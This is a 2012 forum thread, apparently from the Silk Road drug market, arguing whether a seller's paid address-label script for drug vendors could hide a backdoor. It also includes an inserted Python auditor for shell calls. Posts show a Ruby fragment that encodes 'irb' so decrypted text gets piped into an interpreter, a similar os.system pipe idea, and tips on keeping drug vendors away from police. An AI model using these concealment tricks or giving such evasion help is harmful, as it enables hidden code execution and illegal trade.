Such an exploit would be possible to spot if the program went through auditing, someone who doesn't know ruby is not going to look at my code and realize what is going on, they are going to see it doesn't have networking code included with it has no IP addresses or ports listed has no encrypted data included and then assume that they are safe. It would be even less likely to be spotted if I encoded the | as well, or maybe even the entire shell command.

Given the nature of os.system and struct in Python, I'd be surprised if it could be concealed as well as it can in Ruby.  I could be wrong there, but I don't think so.

Quote
* My code does not require or use a network connection in any way (vendors can make their own decisions on whether or not to utilise an air gap).

Neither does the example code I showed, it gets the networking require from the decrypted ciphertext.

It still needs network access, though.

Quote
* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it).  This would pretty effectively stop an exploit checking address data from being used in a live system.

You would still have intelligence that someone who needs software to manage printing a lot of addresses for them is using a certain IP address.

Fair point.

Quote
So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement.  It's one thing to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.

I am just saying that we have no fucking clue what you are doing and I demonstrated that not all backdoors are as obvious as one would assume, even in a language like Ruby, which is similar enough to Python that the example works for demonstration purposes.

Which brings us back to proving it, which we've been round and round on.  Your comment there wasn't merely pointing out what might be, it became an accusation at that point.

Quote
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine.  Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile.  It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.

Stop reading into shit. I never said your code must contain an exploit. I countered your claim that your code MUST NOT contain an exploit because it has NO NETWORKING CODE by showing how a single array of three numbers and a call to pack (which has nothing to do with networking) is all it takes for it to have networking code remotely injected into it (with user interaction....but the user interaction that the entire system is designed to handle anyway) via a ciphertext created from a specially crafted plaintext.

Actually, what you said in response to Limetless' question asking about your code and for proof of my engaging in some kind of deception was this:

And how does this relate to the person being accused.....

it shows that it is fucking stupid to use a script from ANYONE here if it isn't publicly audited, especially if you don't know the language well enough to recognize  | #{[105, 114, 98].pack("c*")}  is all that it takes to fuck you, which will consist of 100% of people who buy the script from Louis.

That pretty clearly states that because you thought of a way to conceal an exploit in a different language that therefore my code will 100% guarantee that users of it will be compromised.

That is a fallacious argument, the only purpose of which being to use in an ad hominem attack.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 11:05 am
Let us make one thing perfectly clear. Air Gaps are a good idea on their security merits. The best in fact. This does not make them trivial to implement and operate in practice for one second. Nuclear scientists are not known to be especially stupid people, but the Iranian Air Gap for the nuclear facility was still breached. I am not suggesting that you need to be a government to run an Air Gap, but the failure of it to work despite being best practice does illustrate the practical difficulties of using Air Gaps. In practice, a vendor using your software + the Air Gap, would have spent so much of his or her time on the Air Gap with time/money that any advantage to your software would be rendered utterly useless.

I am not explaining that for your benefit Louis because you already know it. I am saying the above for anybody who might take your "simples Air Gap simples" as a legitimate answer.

You're making the assumption that data needs to be transferred bidirectionally across the air gap.  The purpose of this software is to parse data in the SR order table and produce printed labels or envelopes.  Once the data is transferred from the system accessing Tor and SR to one with no connectivity except to a printer, there is no requirement to transfer any data back at all.

Once the printing, packaging and posting is done the vendor just logs back into SR and updates the order status as normal.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 11:20 am
Quote
I'd have to add a lot of code to achieve that with my current effort.  There is no way to conceal that something was occurring between the decryption and the parsing of the decrypted data to produce a printable file.  Especially not after stating that the bash command was just the GPG command (i.e. gpg --decrypt-files *.asc) and doing it in Python is this:

Code:
os.system("gpg --decrypt-files *.asc")

it seems to me that you could just do this instead

os.system("gpg --decrypt-files *.asc | some_(obfuscated?)_way_to_run_the_output_as_a_script")

although I am not sure if python comes with something like ruby's irb that would allow you to pipe a script to it to be immediately launched.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 11:24 am
actually I don't think it will work with --decrypt-files because the output is handled differently, I think it would indeed take more code to do it with that flag being used instead of -d.
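An added example, not code from the thread or from LouisCyphre's script: a small Python auditor showing why grepping for os.system stops working once the call is aliased as in `s = os.system`, and how the piped command form discussed above can be flagged. The sample script and the names `build_command` and `placeholder_interpreter` are constructed placeholders.

```python
import ast

# Standard-library callables that pass a string to a shell.
SHELL_SINKS = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
               "subprocess.check_call", "subprocess.check_output",
               "subprocess.Popen"}

# Constructed sample, not the vendor script: it only uses the forms quoted in
# the thread (direct call, alias, command string containing a pipe).
SAMPLE = '''\
import os
from subprocess import call as c
s = os.system
t = s
os.system("gpg --decrypt-files *.asc")
t("gpg -d order.asc | placeholder_interpreter")
c(build_command(), shell=True)
print("labels written")
'''


def grep_hits(source, needle="os.system"):
    """Line numbers a plain text search for the needle would report."""
    return [n for n, line in enumerate(source.splitlines(), 1) if needle in line]


def _resolve(node, aliases):
    """Return the set of dotted names an expression may refer to."""
    if isinstance(node, ast.Name):
        return set(aliases.get(node.id, ()))
    if isinstance(node, ast.Attribute):
        return {f"{base}.{node.attr}" for base in _resolve(node.value, aliases)}
    return set()


def _collect_aliases(tree, max_passes=8):
    """Map local names to dotted names using imports and simple assignments."""
    aliases = {}
    for _ in range(max_passes):  # bounded: chains like t = s settle quickly
        changed = False
        for node in ast.walk(tree):
            found = {}
            if isinstance(node, ast.Import):
                for a in node.names:
                    top = a.name.split(".")[0]
                    # "import os.path" binds "os"; "import os as o" binds "o"
                    found[a.asname or top] = {a.name if a.asname else top}
            elif isinstance(node, ast.ImportFrom) and node.module:
                for a in node.names:
                    found[a.asname or a.name] = {f"{node.module}.{a.name}"}
            elif isinstance(node, ast.Assign):
                for target in node.targets:
                    if isinstance(target, ast.Name):
                        found[target.id] = _resolve(node.value, aliases)
            for name, dotted in found.items():
                if not dotted <= aliases.setdefault(name, set()):
                    aliases[name] |= dotted
                    changed = True
        if not changed:
            break
    return aliases


def audit(source):
    """Return (line, dotted_name, note) for each call that reaches a shell sink."""
    tree = ast.parse(source)
    aliases = _collect_aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        for dotted in sorted(_resolve(node.func, aliases) & SHELL_SINKS):
            arg = node.args[0] if node.args else None
            if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                note = ("literal command with pipe" if "|" in arg.value
                        else "literal command")
            else:
                note = "command built at run time"
            findings.append((node.lineno, dotted, note))
    return sorted(findings)


if __name__ == "__main__":
    print("grep sees lines:", grep_hits(SAMPLE))
    for finding in audit(SAMPLE):
        print(finding)
```

It follows only imports and simple assignments, so a clean result is not evidence that a script is safe; it narrows where a full read of the code should start.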
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 09, 2012, 11:36 am
Let us make one thing perfectly clear. Air Gaps are a good idea on their security merits. The best in fact. This does not make them trivial to implement and operate in practice for one second. Nuclear scientists are not known to be especially stupid people, but the Iranian Air Gap for the nuclear facility was still breached. I am not suggesting that you need to be a government to run an Air Gap, but the failure of it to work despite being best practice does illustrate the practical difficulties of using Air Gaps. In practice, a vendor using your software + the Air Gap, would have spent so much of his or her time on the Air Gap with time/money that any advantage to your software would be rendered utterly useless.

I am not explaining that for your benefit Louis because you already know it. I am saying the above for anybody who might take your "simples Air Gap simples" as a legitimate answer.

You're making the assumption that data needs to be transferred bidirectionally across the air gap.  The purpose of this software is to parse data in the SR order table and produce printed labels or envelopes.  Once the data is transferred from the system accessing Tor and SR to one with no connectivity except to a printer, there is no requirement to transfer any data back at all.

Once the printing, packaging and posting is done the vendor just logs back into SR and updates the order status as normal.

Splendid idea in terms of security, separating PGP public keys from PGP private keys on two different machines. But I've yet to hear from these hordes of Air Gap using vendors. They are a figment of your imagination so far as I can see.

Because you know, I thought this software was to aid the business of decrypting addresses, not upgrading the vendor's operation security to be using Air Gaps.

I'm pretty sure this only occurred to you inside this thread, you admit the use of Air Gaps was not part of the original plan, right? It's not in your advertisement anywhere. This was an afterthought. Is that something you're able to admit? If you're not going to update your advertisement it's just this thought experiment you had this one time.

Since using Air Gaps is so simple, your customers should have no trouble going over this new paradigm according to you. Amongst other things, I contest that, it's rather exotic thing you're expecting us to believe.

--

I cannot comprehend how your customers are expected to adopt tippy top best practices, when the real security vulnerabilities lie with trusting yourself. Your No.1 goal should be removing the necessity of trusting LouisCyphre and replacing it with cryptographic forms of trust from the outset.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 09, 2012, 11:40 am
Quote
Yep, I've demonstrated this a couple of times already.  It's a function, though, Python doesn't have anything like Ruby's put command (no, I haven't learned the language, I just looked at the Wikipedia page on it).

just a wild guess but maybe something like printf("what to put \n") will work ;).


Quote
Which brings us back to proving it, which we've been round and round on.  Your comment there wasn't merely pointing out what might be, it became an accusation at that point.

I never accused you of having a similar backdoor in your code, I only said "hey look, I guess not having networking code in the program isn't as strong of proof that it is not backdoored as you thought"


Quote
Actually, what you said in response to Limetless' question asking about your code and for proof of my engaging in some kind of deception was this:

Which is 100% true. It is stupid to buy a script if you don't know what it is doing and it has not been checked out by enough people who can figure it out. If it is posted publicly anyone can check it out and any backdoor will be quickly found. I could ask a dozen people I know who know python to look it over and let me know if it is safe or not and pass that on to the forum. I am sure a lot of people here either know python or know people who do, and that they could do the same. I point out that it is not necessarily obvious if a script is capable of transmitting data over the internet, that is all that I demonstrated. Even you couldn't figure out what the script was doing until I correctly commented every line of it, it seems that you actually thought the initial bullshit comment I left explaining away the call to unpack was legitimate, even when I intended for my initial post to clearly demonstrate the backdoor. Do you think someone with no programming or command line experience is going to be able to find what was going on there, or will they think it looks innocent and be satisfied with the detailed if partially incorrect (intentionally so) comments I left?

Quote
That pretty clearly states that because you thought of a way to conceal an exploit in a different language that therefore my code will 100% guarantee that users of it will be compromised.

No I said 100% of users who use your software will not be able to identify something like the backdoor I demonstrated in a different language. Because if they could identify it they would program the tool themselves. The solution to keep everyone secure and happy, is to get donations for your work and let the code be publicly audited, because I guarantee you if I read the Ruby script I wrote but someone else had written it, that I would have noticed what was going on. Someone who knows Python but not Ruby looked at it and had a difficult time to figure it out even with most of it commented correctly, I think that goes to show that you should know the language well enough to audit code or be confident that others who know the language well enough to audit code have done so, before you run scripts from anyone.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: grahamgreene on September 09, 2012, 12:02 pm
There have been a lot of unfounded accusations thrown around these forums lately by quite a large number of people; many of these accusations are based on pure conjecture, and that is also the case here as there is no evidence to suggest or back up your claims that LouisCyphre is LE.
If you purchase the code and it does have malicious intent, you can stand behind your claim with proof.
Whilst it is of course possible that the copy you receive may be different than everybody else's, it is terribly foolish to make claims based on pure conjecture, especially claims as serious as this.

- grahamgreene

Graham, we are not playing by the same rules as regular civil society. We are criminals and we cannot afford to be playing by 'Marquis of Queensberry' rules or we will hang.

It is literally not possible to prove anything concrete on a forum of anonymous participants, since all you have is information from them. That does not mean you cannot red flag suspect behavior when it occurs.

Whilst I agree that we are not playing by 'Marquess of Queensberry' rules, given the nature of these forums it is entirely reprehensible to decry someone as being 'the enemy', without proof to back up that claim.
The fact that it is not possible to prove the claim is exactly my point - you made a statement of fact "Say hello to our resident LE Agent. Deciphering LouisCyphre." based on pure conjecture. You didn't "red flag suspect behavior", you straight out called LouisCyphre a law enforcement agent.

I would of course consider it necessary to encourage users to remain cautious and view the product that he is offering with suspicion, and to seek independent verification that it contains nothing malicious. There are more diplomatic ways of doing that than by making a baseless claim that its author and purveyor is the boogeyman. There is nothing stopping the buyer from releasing the code here on the forums for verification (which wouldn't give them much peace of mind as any or all of us COULD be LE), or indeed bringing it elsewhere for the same purpose.
A thread stating "A new product is up for sale which could possibly contain malicious code that could de-anonymize a vendor, and should be independently verified before use." would have been a far better solution than simply identifying someone as LE based on admittedly unverifiable assumptions.

Like I said already, if I am wrong, there is no real downside apart from Louis feeling aggrieved. The other option is that perhaps tens, hundreds, who really knows what number if nobody raised any alarm bells and it was popularized, of vendors go to the wall.

I hope that I am completely wrong. I did not post this thread, as some have said/implied, in some kind of angry ranting mood. In fact I thought about this for several hours before posting it. I realized the only thing that really prevented me from posting and calling out Louis outright was that we knew each other through PGP Club. Since this is an illogical rationale, I wrote to DPR expressing my concern and he thought the best thing would be to air these in public.

Granted the security benefits for the majority outweigh the personal negatives for LouisCyphre, however slandering his good (forum) name and reputation is entirely unnecessary given the alternative method outlined above. You admitted yourself that it is impossible "to prove anything concrete on a forum of anonymous participants". Given that fact, doesn't it seem rather outrageous to make a statement of fact based on conjecture?!

Furthermore, this is an agorist marketplace - as such, LouisCyphre is free to offer the product for sale, as any buyer is free to buy it. Demanding that he release the code for review goes against the ideals of an agorist marketplace wherein individuals are free to market their wares without regulation or coercion. Forgive me for paraphrasing but you are essentially saying "Release the code for independent verification; if you don't, then you're LE."

I have no interest in this product, nor any interest in whether LouisCyphre is LE or not. If he's not, great. If he is, so be it. That does not take away from the fact that he is free to offer his wares in this agorist marketplace, which would seem to be a view that DPR shares as evidenced by telling you to "take it to the forum" rather than deciding to regulate the product / vendor in question.
You cannot deny freedom to a minority in order to guarantee freedom for the majority. It is simply wrong, and goes against everything that this place stands for.

I know something about computer hacking. I know more than I want to about law enforcement, that is where my certainty that this is a highly suspect, probable LE act comes from. If this is paranoia, it is most assuredly informed paranoia.

This is the equivalent of preventative medicine. Would you want doctors to wait until they are 100% certain it is a cancerous tumor, or do you wish them to cut it out, even if it later turns out to be entirely benign? Or maybe you want to give the strange unknown lump a fair shake. After all, you have not yet proven it is cancerous. This is a direct analogy, because if you are busted on SR, it will be like a disease removing years from your lifespan, they are likely to be heavily disproportionate since they cannot catch us all at once, and will attribute yourself as a 'prime mover', as part of a conspiracy. I mean that in the legal sense of the word. That is if somebody on SR commits a crime, then you are responsible for it. Sounds like something I'm making up I know, but I'm unfortunately not.

Paranoia, whether informed or not, has nothing to do with this. I would agree that it IS highly suspect, purely because of the fact that it may contain malicious code that may put a vendor's freedom at risk. Again, it "may". Not "does". Until we see the code, we have no way of knowing either way. I'm looking at this from a purely agorist perspective, pine; I completely agree with you that people should be warned of any potential security risks, but to state that someone is LE and should give away their product for free simply because it may be damaging should it contain something malicious is entirely unreasonable given the principles by which this market and this community operate.

So, those are the stakes.

A "middle of the road" perspective, where everybody has a point but nobody is completely wrong is a dangerous one. It makes LE agents into hypothetical creatures, which they most certainly are not. A lack of visibility on this is a key problem on this hidden service, kmfkewm has frequently noted this, it is detrimental to drug consumers, but positively lethal to drug suppliers.

There are two options before you: Louis Cyphre is a LE agent or he is not. Ignore his words after the incident, and examine his actual actions. What do you get?

I have put the probability at 70:30, which I think is more than fair. You can arrive at your own personal conclusions. I do not require other people to agree with me to change that ratio up or down, that would be fundamentally irrational when for all we know half the respondents in the thread could also be LE sockpuppets.

So in short, you don't get to change the title of *my* thread because you don't agree with me. That doesn't make sense. You can however make your own thread on this topic and call it whatever you wish.

A "middle of the road perspective" certainly doesn't make LE agents into hypothetical creatures; we all know that the risks are very real, and we all know that our enemies will stop at nothing in their efforts to throw bars around our freedom, but that is not a valid reason to abandon the principles of the very thing which we are trying to protect. When we abandon those principles we abandon the ideals behind them.

When I examine LouisCyphre's actual actions, I get an individual who wishes to sell a product which he has worked on and for which he is entitled to remuneration should he desire it. Nothing more, nothing less. I see the very real risk in implementing something which would have huge security concerns were it not independently verified, of course, but that is not something that concerns any of us further than strongly encouraging those who use it to do so with a security conscious mindset.

You're putting the probability that LouisCyphre is LE at 70:30. This is not probability, it is conditional probability based on a single assumed event which itself is conditional in nature. It is not unlike me stating that it is 70% likely that you are LE based on my hypothetical assumption that your main function here is to cause dissent on the forums. As you would probably agree, a most baseless accusation.
I am not agreeing nor disagreeing with your personal conclusion, I am simply stating that you have arrived at an entirely subjective result, not a factual one.

I don't want to change the title of *your* thread, I am simply asking you to reconsider its wording given the unprovable and slanderous statement it contains.

As I've stated before, I have a lot of respect for you for the huge amount of work you put in to the security aspect of this community and none of the above is a personal attack on you; however I cannot stand idly by whilst the very ideals of this marketplace are trod on in the interests of security.
To quote Benjamin Franklin: "They that can give up essential liberty to purchase a little temporary safety, deserve neither liberty nor safety."

As far as the following:
I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by its very regulatory nature is what powers the governments of today, and with them, their restrictive laws.

I think you just lost pretty much everybody here. Is this a postmodernist interpretation of capitalism?

That statement was a response to Limetless' somewhat tongue-in-cheek remark of "Nowt wrong with Capitalism. It's what drives progress. Bloody hippies." I was simply stating that I used to be a model capitalist before I experienced something of an epiphany after a number of personal life-changing events.

With even a cursory glance we can clearly see that the capitalist model employs regulation (the fact that it doesn't actually benefit from it is a topic for another day) and is the subject of constant government intrusion. We can also clearly see that the regulatory nature of capitalism powers the governments of capitalism based economies by giving them extensive influence over the markets and the people within those markets, thus the regulatory nature of capitalism directly affects the implementation of laws (such as drug prohibition due to extensive lobbying by certain interest groups etc.)

My declaration was simply a statement of my views as they currently stand, nothing more.

- grahamgreene
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 12:05 pm
A: What you get today, may not be what you get tomorrow. A bait and switch is as simple as it gets with exploits.
Easily proven wrong with SHA256 checksums.  Actually, there's a point, better go and add that for the individual files.

Yes you should. But you didn't do this in the first place, if we believe that you are telling us the truth, then this thought has come to you in hindsight.

SHA sums only really help if getting code from multiple sources, to confirm that copies obtained elsewhere have not been modified after leaving the main distribution point.

Currently this code only has one distribution point.  If it already contained an exploit, as you and Kmf are asserting is the case or is possible (respectively), then the hash of the file proves nothing.  It only helps me if someone purchases the code, adds something dodgy and then posts that version to the forum.

That's the central troubling factor, that you have talked a great deal about security in the past and yet you made what many of us consider an elementary mistake.

As I said above, the SHA sums don't help users in this case, they just help me if someone tries doctoring the code as part of a framing effort.  I added the hashing because after reading your tirades I realised that this was now a possibility.

When the issue of whether obtaining programs from anonymous people on drug forums is considered sketchy is brought up, your answer is that the vendors can audit the code, which as kmfkewm pointed out later in this thread, is fundamentally illogical because if they can audit the code then they can also write it themselves.

What I said was that I could explain precisely what every line does and provide links to online sources (e.g. docs.python.org) which showed I was not lying about those explanations.  There is documentation on python.org and questions on stackoverflow.com which have examples which demonstrate multiple parts of the functions in the code.

*Pine talking about a way to deliver an exploit.
That's also how Anonymous got the kiddie fiddlers, by getting them to use an infected version of Tor Button.

The question rears its head again of why somebody who clearly knows about the dangers of exploits, would seemingly come up with a plan that bears a startlingly close resemblance to one. It is clear that you must either have malicious intentions, or a rather severe lack of introspection.

Or possibly I was as tired as I am now when I posted the listing.  Which is possible, because I listed it, made a couple of posts to the forums and then went to bed.  When I woke up this "charming" thread was waiting for me.

C: The vast majority of vendors will not be computer programmers and will have to rely on trust in somebody else's judgement. This is very bad. If you have a flock of apparent experts telling you it's legitimate, you let down your guard and then you get fucked.

The code isn't that complex, I can step them through the essentials of what it does and then they can ask someone not connected to all of this whether I'm full of shit or not.

Red flags everywhere! I think it's already been pointed out, but you're strongly implying that they should trust your judgement. Which given our discussions on relying exclusively on cryptographic trust...

Not mine exclusively.  That's why I made sure I could back up any explanation of what the code does with corroborating info on sites that are way beyond my control (e.g. python.org).

The focus of our concern is that you could be an able enough wordsmith for vendors to think: "yeah, that all sounds pretty legit, no need to get overly paranoid and get other people to test it, I'll just make a quick sweep of the forums and if everybody's happy it should be all good..." (the bandwagon fallacy, it's common to all investors in bubbles as well).

Well, I'd like to think I'm reasonably good at writing, but you didn't mean that as a compliment.

Of course you could (or not, we only have your word for it and your advert contains no caveats of this nature) advise they have somebody else audit the code to check Louis is not bullshitting them, but the real life situation is that

I'll grant that the listing needs a serious rewrite.  For the moment there's a link to this thread on it.

A: Vendors are busy people.

Which, ironically, was the real motivation for my being approached to write it in the first place.

B: Most vendors don't know code (and as evident from this thread, some people think that open source automatically implies a near certain lack of backdoor exploits, which is hilarious were this not so serious when you consider that it is only open source to people who can't read the damn code in the first place, I mean talk about being a one eyed man in the valley of the blind!),

Yet you also argue that posting the code to a forum which, by its very nature, has less technically competent people able to audit it is a better solution.  Go figure.

I am not convinced that posting any code on the forum would provide anywhere near the level of robust auditing that is available on the clearnet.

and C: this has gone unsaid so far, but it's important, that *they have already paid up for the software and they need to use it right away or they wouldn't have purchased it*.

You can always beat them to it and purchase it for a proper review.  Hell, you could start a "prove LouisCyphre wrong" tip jar for that purpose.

This is practically the archetype of a situation in which somebody would sacrifice security for convenience.

Hmm, that's a good point.  I'll have to see what I can do to try to offset that.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 09, 2012, 12:16 pm
I'm far too tired to respond to all of these now, but I'll be back to do so after I've had some sleep.  I did, however, want to address this right now.

Do you want to also post the rest of our communication surrounding that exchange? Because you missed the bit where I explain I have to go double check this thing. You'd think the smiley face emoticon would indicate an element of humor regarding my so called "accusation".

I do find it interesting you're storing decrypted messages though.

I do not store the decrypted messages.  I store the encrypted ones so I can double-check things I might have missed.  In fact, the bit you quoted showed that I had created a new file, put the ciphertext in it and then decrypted it.

Note the timestamp on the file and the timestamp on the message.  You know I use Emacs to edit these text fields and you know it inherits the semi-chroot environment of Tor, so that timestamp is in UTC just like the forum posts.

As for the smiley, yes, at the time I thought you were joking.  Right up until starting this thread.  Then I had to consider the very real probability that you were not joking then.

Anyway, bed is calling me and I'll address your other responses (and no doubt a number more) upon my return.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 10, 2012, 05:26 am
"Hi, I'm LouisCyphre, you all know me so you already know I'm ok, my software is totally legit because I could have hypothetically done one of the things I mentioned above (but didn't) but don't worry because if you get arrested because it contained an exploit you can always tell DPR to suspend my account, LOL free market FTW, eh?!"

LOOOOOOOL.

I'm sure Louis and his supporters will think this is a monstrous allegation, but I had the voice of Troy McClure from The Simpsons in my head when I read his advertisement and then when I wrote the above.

http://img01.lachschon.de/images/54679_troy_mcclure.jpg

Also bumping because how is this down five pages in just a couple of hours! If it was general discussion it'd be still on page 1 or maybe page 2 for sure. Also the sticky section seriously needs tidying up here.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 10, 2012, 06:43 am
I strongly identify with Agorism, but one common theme I notice in many people who identify as such is that they let their ideological insistence on free markets and profit cloud their thinking. I actually notice this strongly when it comes to security software in particular. In many cases the best security and anonymity solutions are inherently free

...

Now I have nothing against people being paid for their resources, but from a security point of view I cringe at the idea of adding an entire unnecessary financial payment topology to an anonymity network. Now you need to anonymize the network traffic and the payment for the network traffic.

...

So Agorism is awesome and profiting from your work is awesome, but some things just do not mix well with profit unless you are extremely careful with how you go about it. You can donate cash to the Tor project and even to individual node operators in many cases. They do not make you pay to use their resources though. Truecrypt does not make you pay to use it, the source code is open and it is freely available for anyone to download and audit. At the same time they accept donations and make thousands of dollars.

...

We should not put the financial interests of vendors here above the security of everyone else.

Vendors who purchase this code are not going to go through it with a fine tooth comb because if they knew enough to do that then they would simply make the program themselves. We need to be practical when we think of situations like these, sure it is possible to run this code completely isolated and be one hundred percent safe. Are people going to actually do this? Probably not. It is almost a strawman to give arguments like this, because in reality the people who would purchase this are not going to isolate it they are not going to audit it etc. Even if the code is one hundred percent non-malicious it doesn't matter because if we don't point out that people should not buy restricted access software from Louis then we have no right to point out that people should not use restricted access software that is offered through SR (or anywhere else) at all. It has nothing to do with Louis as an individual or a vendor, it has to do with best security practices, and the best practice for security would be to not run scripts that 99% of people on the forum are never going to look at, especially when the 1% of people who will pay for them are certainly going to be the people who do not have the skills to audit them.

I agree with all those sentiments. I think there's a whole lot of apragmatic thinking going on in this thread, people banging on about their "rights" and etiquette. They appear to have forgotten the government says they have the right to go to prison if they find you! This kind of thinking would be a one way ticket to the slammer if this was an RL black market. I think the forum/e-commerce interface has given them a false sense of normality.

Quote
Declaring LouisCyphre as "our resident LE Agent" is incredibly rash of you pine, and defamatory in the extreme; in the interest of fairness I would ask that the thread title be amended to reflect the fact that there is absolutely no evidence to back up this accusation.

A fair enough point.

When you say "absolutely no evidence" (referring here to Graham I believe), that's not exactly true now is it.

What we have here is circumstantial evidence. Somebody acting in a suspicious way.

I agree this is not hard evidence, I said it wasn't scientific myself even. But you cannot get hard evidence when everybody is anonymous, it's next to impossible! This is an unreasonable standard to set. I mean, what do people want? So, unless I can find some LE document showing Name X also alias LouisCyphre is on the payroll or the equivalent, then it's not fair to accuse anybody of being suspicious?! If I had hard evidence, there would be *no* need to come onto the forum whatsoever with this thread! We'd just delete all LouisCyphre's stuff and ban him. Is this not true? You surely accept this, right?

Does that then mean that denouncing somebody on the forum is an illegitimate thing to do, forever and always? Because this is the implication of what I'm hearing here. If you need physical evidence and circumstantial evidence is non-admissible, then you have set yourself a really ludicrous standard for a black marketeer.

As an analogy, it is like you have taken a trip with your friends, it is drug transportation kind of deal across a long distance and you are all feeling nervous.

At a gas stop, when you come out after paying the fuel ticket, you see that one of your pals is reaching underneath the car, fiddling with something or other.

You then try to examine underneath the car yourself, because you think this behavior is mighty suspicious. Maybe it is a LE tracking device and your so called friend is actually a CI.

But your "friend" prevents you. Your friend says to you that you can't look under the car because you don't own the car. More suspicion. Now you really want to look under the car.

You query this, more than somewhat incredulous. He says, further to this, that anybody who looks under his car must either buy/rent his car, and that only mechanics who are also drug smugglers can buy/rent the car. You tell him relatively few drug smugglers are also mechanics, maybe he could have a LE tracking device underneath the car and nobody would notice. Indeed, any drug smuggler who was also a mechanic would almost certainly have his own vehicle to transport drugs with! Your "friend" informs you that this is ok, because he is a mechanic he will describe exactly what you are seeing, step by step, if you buy/rent his car.

But you are not sure this is legitimate. I mean, even if he explained everything about the underside of the vehicle, you can't be sure he doesn't know some sneaky hideaway place only experienced mechanics know about. Perhaps you've seen some sneaky ass shit for hiding stuff on "Border Watch", a LE propaganda show.

As such, you call to your other friends who were previously busy molesting the cola and candy counters in the gas station's shop, point to your mechanic person and tell them to watch this guy, he is acting suspect, could be a LE agent for sure, putting tracking devices under cars is practically a LE trope.

At this point your potential LE agent flips out and says all the drug smugglers who buy/rent his vehicle are going to drive the vehicle into a giant portable Faraday cage when they are using his car.

This seems unlikely to you, and you are not persuaded. Sounds like something the Army might do, bit far out.

You inform your other friends that they should only rent or buy cars to transport drugs in future from people who are unconnected to the trade e.g. a typical car dealership.

Meanwhile, your potential CI is fuming and claims you're paranoid as fuck, some manner of crazy bitch to go accusing him of being a LE agent.

Well... True dat. :D

Quote
You may assert that because he won't release the source code that he must be LE, or malicious in the extreme, but there is absolutely no logic in that at all. He's a creator of a digital item that he wishes to sell on an agorist marketplace, to anybody who wishes to buy it. He is allowed to do that, and has a right to do it without prejudice.
Asserting that he has malicious intent before you've seen the code is outrageous. Whilst I can see where you're coming from and how you arrived at the conclusion that you did, if you feel there is something malicious in what LouisCyphre is offering you are free to purchase it and review the code yourself for peace of mind - just like anybody else.

It is not particularly outrageous. If someone here suggests that we all stop using Tor and start using their for profit VPN, I will be the first to claim that the person is likely a law enforcement agent, Agorism and individual profit be damned.

Pragmatism. Saving your ass since we crawled out of the primordial soup. :)
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: wizdom on September 10, 2012, 01:51 pm

Pragmatism. Saving your ass since we crawled out of the primordial soup. :)


Paranoia, saving my ass since I first stole a candy, a kiss, a smoke, a day off, a bag of weed, a woman, a pill, an identity, a credit card, a mortgage, a business, a life.

Modzi
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 10, 2012, 08:07 pm
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.

This is junk. Just like your answer with the Air Gap.

Putting exploits into a JPEG file, or any binary for that matter, is many orders of magnitude more difficult than, just for example... merely giving somebody a program which contains an exploit directly.

This answer you gave, only makes sense to somebody who doesn't know security. That is what has concerned me over and over again, that all your answers sound good on paper to somebody who is less than knowledgeable about computer security e.g. most vendors.

It still makes better sense for LE to target vendors wholesale by using a method that they're all going to see or open than by placing a product which they may or may not purchase up for sale.  For targeting a specific vendor then selling a product generally still isn't the way to go, the way to go there is to send them whatever the bait is directly.

My point with the JPEG example was not that it was easier, but that the strategy behind using one would be better for a wholesale attack targeting vendors.

Or that you wouldn't simply perform a bait and switch with the software. A single line of code could compromise a vendor's IP address, and it wouldn't have to look obvious like a direct network call either.

It would still require access to a network.

Eventually yes, but it doesn't have to be on a live network or happen immediately.

Which is completely nullified when data only travels one way across the air gap.

SROPPy with an air gap is basically: order data on SR --> written to read-only media --> taken to unconnected system with printer --> data processed by SROPPy --> printed --> data destroyed.

if an exploit was used in the way I described,

Yes, both you and Kmf have thought up clever ways to be twisted bastards, but that doesn't mean that I implemented it.

it would bypass even an Air Gap to decrypt messages and SHA-1 checksum validation on data intended to be outgoing on the networked machine. It isn't really a technological attack, but a psychological one that depends on the vendor not noticing that some characters in his plaintext message have been substituted for other extremely similar characters in order to encode information.

It does, however, still require a bi-directional flow of data across a network.  SROPPy only needs data from a network, it goes out to a printer (and eventually through the post in the form of a label or on an envelope).

The "TLDR;" is this. If you think an exploit must rely on a network ping or that an exploit will be visible if you're looking straight at it, then you're wrong. Exploits are nearly always based on a combination of 10% technology and 90% understanding human psychology, ever since the first viruses were invented.

Funny you should mention psychology.  Have you heard of shadow projection?

This is not science fiction stuff, it's not especially difficult to do things like this. It is simple to avoid the entire issue by not using unaudited software from anonymous sources, such as your initial proposition Louis.

